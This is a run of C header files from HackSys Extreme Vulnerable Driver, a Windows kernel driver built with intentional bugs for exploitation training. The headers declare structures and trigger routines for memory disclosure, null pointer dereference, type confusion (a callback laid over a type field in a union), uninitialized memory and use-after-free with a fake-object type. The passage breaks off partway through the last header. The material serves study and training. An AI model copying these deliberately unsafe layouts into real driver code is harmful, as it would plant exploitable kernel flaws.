14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | MemoryDisclosureNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | memory disclosure in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
54 | #define __MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
//
// Size in bytes of the NonPagedPool allocation whose contents this module
// copies out to the caller; see MemoryDisclosureNonPagedPool.c (not in view).
//
#define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
//
// Implemented in MemoryDisclosureNonPagedPool.c (not in view). Data flows
// kernel -> user: UserOutputBuffer is, by its naming, a user-mode destination
// and Size the caller-controlled number of bytes requested.
//
NTSTATUS
TriggerMemoryDisclosureNonPagedPool(
    _In_ PVOID UserOutputBuffer,
    _In_ SIZE_T Size
);
75 |
76 | #endif // !__MEMORY_DISCLOSURE_NON_PAGED_POOL_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/MemoryDisclosureNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see https://www.gnu.org/licenses/.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | MemoryDisclosureNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | memory disclosure in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
54 | #define __MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
//
// Size in bytes of the NonPagedPoolNx allocation whose contents this module
// copies out to the caller; see MemoryDisclosureNonPagedPoolNx.c (not in view).
//
#define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
//
// Implemented in MemoryDisclosureNonPagedPoolNx.c (not in view). Data flows
// kernel -> user: UserOutputBuffer is, by its naming, a user-mode destination
// and Size the caller-controlled number of bytes requested.
//
NTSTATUS
TriggerMemoryDisclosureNonPagedPoolNx(
    _In_ PVOID UserOutputBuffer,
    _In_ SIZE_T Size
);
75 |
76 | #endif // !__MEMORY_DISCLOSURE_NON_PAGED_POOL_NX_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | null pointer dereference module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __NULL_POINTER_DEREFERENCE_H__
54 | #define __NULL_POINTER_DEREFERENCE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Object used by the null pointer dereference module. FunctionPointer is
// presumably the callback typedef from Common.h -- confirm there.
//
typedef struct _NULL_POINTER_DEREFERENCE
{
    ULONG Value;                // value stored next to the callback slot
    FunctionPointer Callback;   // callback slot; dereferenced by the module
} NULL_POINTER_DEREFERENCE, *PNULL_POINTER_DEREFERENCE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
//
// Callback routine belonging to the null pointer dereference module;
// presumably what the Callback slot of NULL_POINTER_DEREFERENCE is set to
// on the legitimate path -- confirm in NullPointerDereference.c.
//
VOID
NullPointerDereferenceObjectCallback(
    VOID
    );

//
// Trigger routine. UserBuffer is a raw user-mode pointer handed through from
// the IOCTL handler; any probing of it happens inside the implementation.
// Returns an NTSTATUS.
//
NTSTATUS
TriggerNullPointerDereference(
    _In_ PVOID UserBuffer
    );
83 |
84 | #endif // !__NULL_POINTER_DEREFERENCE_H__
85 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | TypeConfusion.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | type confusion module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __TYPE_CONFUSION_H__
54 | #define __TYPE_CONFUSION_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// User-mode view of the type confusion object: two pointer-sized fields.
// Its layout must stay in step with KERNEL_TYPE_CONFUSION_OBJECT below,
// whose second field is a union overlaying ObjectType.
//
typedef struct _USER_TYPE_CONFUSION_OBJECT
{
    ULONG_PTR ObjectID;     // identifier supplied by the caller
    ULONG_PTR ObjectType;   // type tag supplied by the caller
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
68 |
//
// Kernel-side view of the same object. ObjectType and Callback share storage
// through the anonymous union, so a value written as ObjectType can later be
// read back as Callback -- that overlap is the type confusion the module
// demonstrates. The defensive shape is a separate type tag that is checked
// before the callback member is used.
//
// C4201 is MSVC's "nonstandard extension used: nameless struct/union"
// warning, silenced only around this definition.
//
#pragma warning(push)
#pragma warning(disable : 4201)
typedef struct _KERNEL_TYPE_CONFUSION_OBJECT
{
    ULONG_PTR ObjectID;             // identifier, same offset as in the user view
    union
    {
        ULONG_PTR ObjectType;       // type tag ...
        FunctionPointer Callback;   // ... overlaid by the callback pointer
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
#pragma warning(pop)
81 |
82 |
83 | //
84 | // Function Definitions
85 | //
86 |
//
// Callback routine of the type confusion module; presumably the legitimate
// value for the Callback member of KERNEL_TYPE_CONFUSION_OBJECT -- confirm
// in TypeConfusion.c.
//
VOID
TypeConfusionObjectCallback(
    VOID
    );

//
// Trigger routine. UserTypeConfusionObject is a user-mode pointer to a
// USER_TYPE_CONFUSION_OBJECT; probing and copying are the implementation's
// responsibility. Returns an NTSTATUS.
//
NTSTATUS
TriggerTypeConfusion(
    _In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject
    );

//
// Initializes a kernel-side object. Takes the kernel object, not the user
// one, so by the time it runs the user data has already been copied in.
// Returns an NTSTATUS.
//
NTSTATUS
TypeConfusionObjectInitializer(
    _In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject
    );
101 |
102 | #endif // !__TYPE_CONFUSION_H__
103 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UninitializedMemoryPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in PagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __UNINITIALIZED_MEMORY_PAGED_POOL_H__
54 | #define __UNINITIALIZED_MEMORY_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Pool-resident object of the uninitialized memory (PagedPool) module.
// The 58-element pad presumably sizes the allocation to a specific pool
// chunk -- confirm against the allocation in UninitializedMemoryPagedPool.c.
//
typedef struct _UNINITIALIZED_MEMORY_POOL
{
    ULONG_PTR Value;            // value field
    FunctionPointer Callback;   // callback slot used by the module
    ULONG_PTR Buffer[58];       // pointer-sized padding
} UNINITIALIZED_MEMORY_POOL, *PUNINITIALIZED_MEMORY_POOL;
69 |
70 |
71 | //
72 | // Function Definitions
73 | //
74 |
//
// Callback routine of the uninitialized memory (PagedPool) module;
// presumably the value the Callback slot is meant to hold once the object
// is properly initialized -- confirm in the .c file.
//
VOID
UninitializedMemoryPagedPoolObjectCallback(
    VOID
    );

//
// Trigger routine. UserBuffer is a raw user-mode pointer from the IOCTL
// handler; validation happens in the implementation. Returns an NTSTATUS.
//
NTSTATUS
TriggerUninitializedMemoryPagedPool(
    _In_ PVOID UserBuffer
    );
84 |
85 | #endif // !__UNINITIALIZED_MEMORY_PAGED_POOL_H__
86 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UninitializedMemoryStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __UNINITIALIZED_MEMORY_STACK_H__
54 | #define __UNINITIALIZED_MEMORY_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Stack-resident object of the uninitialized memory (Stack) module. Same
// shape as UNINITIALIZED_MEMORY_POOL except that Value and the pad are
// ULONG rather than ULONG_PTR, so the two objects differ in size on x64.
//
typedef struct _UNINITIALIZED_MEMORY_STACK
{
    ULONG Value;                // value field
    FunctionPointer Callback;   // callback slot used by the module
    ULONG Buffer[58];           // 32-bit padding
} UNINITIALIZED_MEMORY_STACK, *PUNINITIALIZED_MEMORY_STACK;
69 |
70 |
71 | //
72 | // Function Definitions
73 | //
74 |
//
// Callback routine of the uninitialized memory (Stack) module; presumably
// the value the Callback slot holds on the initialized path -- confirm in
// the .c file.
//
VOID
UninitializedMemoryStackObjectCallback(
    VOID
    );

//
// Trigger routine. UserBuffer is a raw user-mode pointer from the IOCTL
// handler; validation happens in the implementation. Returns an NTSTATUS.
//
NTSTATUS
TriggerUninitializedMemoryStack(
    _In_ PVOID UserBuffer
    );
84 |
85 | #endif // !__UNINITIALIZED_MEMORY_STACK_H__
86 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UseAfterFreeNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFreeNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | use after free in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __USE_AFTER_FREE_NON_PAGED_POOL_H__
54 | #define __USE_AFTER_FREE_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Object of the use-after-free (NonPagedPool) module: a callback pointer
// followed by 0x54 bytes of payload.
//
typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
    FunctionPointer Callback;   // callback slot, first in the object
    CHAR Buffer[0x54];          // opaque payload bytes
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;
68 |
//
// Byte-array object whose length mirrors USE_AFTER_FREE_NON_PAGED_POOL
// (one pointer plus 0x54 bytes). Note that the real object is aligned to
// sizeof(PVOID) and may carry tail padding on x64, whereas this CHAR array
// has no padding, so sizeof() of the two is not guaranteed to match.
//
typedef struct _FAKE_OBJECT_NON_PAGED_POOL
{
    CHAR Buffer[0x54 + sizeof(PVOID)];  // same nominal size as the real object
} FAKE_OBJECT_NON_PAGED_POOL, *PFAKE_OBJECT_NON_PAGED_POOL;
73 |
74 |
75 | //
76 | // Function Definitions
77 | //
78 |
//
// Callback routine of the use-after-free (NonPagedPool) module; presumably
// the value installed in the Callback slot at allocation -- confirm in the
// .c file.
//
VOID
UaFObjectCallbackNonPagedPool(
    VOID
    );

//
// Use / Free / Allocate operate on module-level object state that is not
// declared in this header. The order in which the IOCTLs are issued is
// what decides whether Use runs against a live or a freed object, so the
// implementation is where any lifetime tracking (e.g. nulling the pointer
// on free) would have to live. Each returns an NTSTATUS.
//
NTSTATUS
UseUaFObjectNonPagedPool(
    VOID
    );

NTSTATUS
FreeUaFObjectNonPagedPool(
    VOID
    );

NTSTATUS
AllocateUaFObjectNonPagedPool(
    VOID
    );

//
// Allocates a pool object from a user-supplied FAKE_OBJECT_NON_PAGED_POOL.
// UserFakeObject is a raw user-mode pointer; probing is the implementation's
// responsibility. Returns an NTSTATUS.
//
NTSTATUS
AllocateFakeObjectNonPagedPool(
    _In_ PFAKE_OBJECT_NON_PAGED_POOL UserFakeObject
    );
103 |
104 | #endif // !__USE_AFTER_FREE_NON_PAGED_POOL_H__
105 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UseAfterFreeNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFreeNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | use after free in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
54 | #define __USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Object of the use-after-free (NonPagedPoolNx) module: a callback pointer
// followed by 0x54 bytes of payload. Layout matches the NonPagedPool variant.
//
typedef struct _USE_AFTER_FREE_NON_PAGED_POOL_NX
{
    FunctionPointer Callback;   // callback slot, first in the object
    CHAR Buffer[0x54];          // opaque payload bytes
} USE_AFTER_FREE_NON_PAGED_POOL_NX, *PUSE_AFTER_FREE_NON_PAGED_POOL_NX;
68 |
//
